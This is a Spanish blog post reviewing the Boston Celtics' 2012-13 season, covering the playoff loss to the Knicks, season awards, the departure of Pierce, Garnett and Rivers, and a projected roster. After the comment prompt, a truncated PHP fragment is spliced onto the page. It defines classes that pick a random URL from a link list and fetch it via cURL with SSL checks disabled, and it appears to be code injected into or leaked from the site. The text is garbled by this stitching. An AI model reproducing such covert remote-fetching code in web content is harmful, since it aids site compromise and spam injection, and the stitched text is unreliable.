Boston Celtics: Insuficiente

27 de July de 2013 por TheDeerHunter

Todo tiene un final. Este es el de la última estirpe de orgullosos y combativos Celtics, dignos representantes de la mejor tradición baloncestística. Los nombres de Doc Rivers, Paul Pierce, Kevin Garnett, Ray Allen y Rajon Rondo quedarán inscritos con mayúsculas en la historia de la franquicia del trébol, donde no vale cualquier cosa y la camiseta pesa como ninguna.

La salida de Ray Allen el verano pasado ya suponía el principio del fin. El paso del tiempo y la edad del eje del equipo los suponía “acabados” años antes pero ellos siempre se las arreglaron para combatir a los incrédulos y para competir al más alto nivel. El legado es “únicamente” un anillo y un subcampeonato pero creándose una identidad propia entre los mejores equipos de baloncesto de la historia. Lo que no ganaron fue simplemente porque no era humanamente posible hacerlo.

Como decíamos la salida de Allen fue más una contrariedad anímica que otra cosa, pues sus piernas ya no le permitían mantener óptimamente su rol. Sin embargo, la llegada como recambios de Jason Terry y Courtney Lee ha sido de lo más decepcionante del año. Sin un perímetro de nivel, los Celtics han sufrido como nunca ofensivamente. Las incorporaciones en la pintura, como era de esperar, tampoco solucionaron el tradicional problema bajo tableros. Este curso han sido el segundo peor equipo reboteador de toda la liga. 

En esta situación la regular se les hizo eterna, sudando sangre para mantener un balance cómodo, incapaces de tocar la parte alta del cuadro de la conferencia. Todos esperábamos su habitual arreón post-all star y el modo “perro” en playoffs, pero en eso caía Rondo “out of season” y con él cualquier esperanza de plantar cara. Sólo el nivel de la conferencia les aseguraba plaza de postemporada. Balance de 41-40 que no da para soñar mucho.

Como mal menor, un cruce en primera ronda contra New York Knicks, el rival menos rocoso de entre los cocos de la conferencia. En algún momento fueron capaces de ponerles en dificultades pero el colapso en ataque se hizo patente. En los tres primeros choques de la serie no se pasó de 80 puntos. El pundonor del equipo y la resurrección de Jeff Green maquillaba el resultado pero no evitaba la derrota ante un rival que no ha llegado a demostrar nada.

El proyecto se ha estirado todo los posible pero la reconstrucción tenía que llegar. Está por ver si Rondo es el hombre adecuado para construir en torno a él y quedan muchas dudas de cómo se ha resuelto la salida de la vieja guardia. La situación salarial no es la mejor para el proceso que se avecina. Durante los últimos tiempos la franquicia ha perdido capacidad de reinventarse. Esperemos que no tengan que pasar otros 20 años para verles pelear por el título de nuevo.

PREMIOS 

MVP: Al final los mejores los de siempre. Pierce y Garnett, con 72 años entre ambos, han mantenido al equipo en la pomada todo lo posible. Se va a hacer raro verles con otra camiseta.

Rookie: Hasta su lesión Jared Sullinger demostró que podía sumar, especialmente en rebotes donde más falta les hace. En enero, justo antes de romperse, llegamos a verle hacer dobles dígitos en rebotes con cierta facilidad.

Sorpresa: No hay muchas dudas sobre la calidad de Jeff Green. Las había respecto a si volvería a sentirse jugador de baloncesto tras sus problemas cardíacos. La respuesta puede observarse en la extraordinaria serie que se marcó ante Melo.

Decepción: Se esperaba mucho más de todo un campeón como Jason Terry. Intrascendente.

Esfuerzo en vano: Avery Bradley es el que más intensidad pone del equipo. Se trata de un defensor de élite pero su esfuerzo no queda traducido en su aportación numérica. Es muy improbable que pueda ser compatible con Rondo si no mejora su producción ofensiva.

JUGANDO A GM

El equipo está esencialmente cerrado. No queda otra que valorar los movimientos a posteriori:

– El para muchos mejor entrenador en activo, Doc Rivers, va a ser difícilmente sustituible. Sin grandes exigencias, no es descabellado darle la alternativa a Brad Stevens. No obstante el anterior antecedente de asimilado célebre desde la NCAA fue un absoluto fracaso.

– El movimiento de salida de Pierce&Garnett parece leerse como agradecimiento a los servicios prestados. Sin embargo, comerse el salario por dos años de Gerald Wallace es difícilmente digerible en las actuales circunstancias.

– Por el rendimiento de Olynick en las summer parece difícilmente discutible su fichaje. No terminamos de entender en este contexto el de Faverani.

– Como decíamos Rondo y Bradley no son demasiado compatibles. Quizá no sería mala idea plantearse la salida del base all-star. Seguro que se puede sacar algunas buenas piezas por él. Bradley también cuenta con un buen cartel. El que con total seguridad sería deseable que saliera es Lee pero con su rendimiento esos 5 millones anuales son inasumibles para nadie. Hay overbooking de escoltas.

Así, salvo sorpresas estos serán los Celtics de la 2013/14:

PG: Rondo, Phill Pressey
SG: Bradley, Lee, Marshon Brooks, Keith Bogans, Jordan Crawford
SF: Jeff Green, Gerald Wallace
PF: Sullinger, Bass, Humphries,
C: Olynick, Faverani, Fab Melo, Shavlik Randolph

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>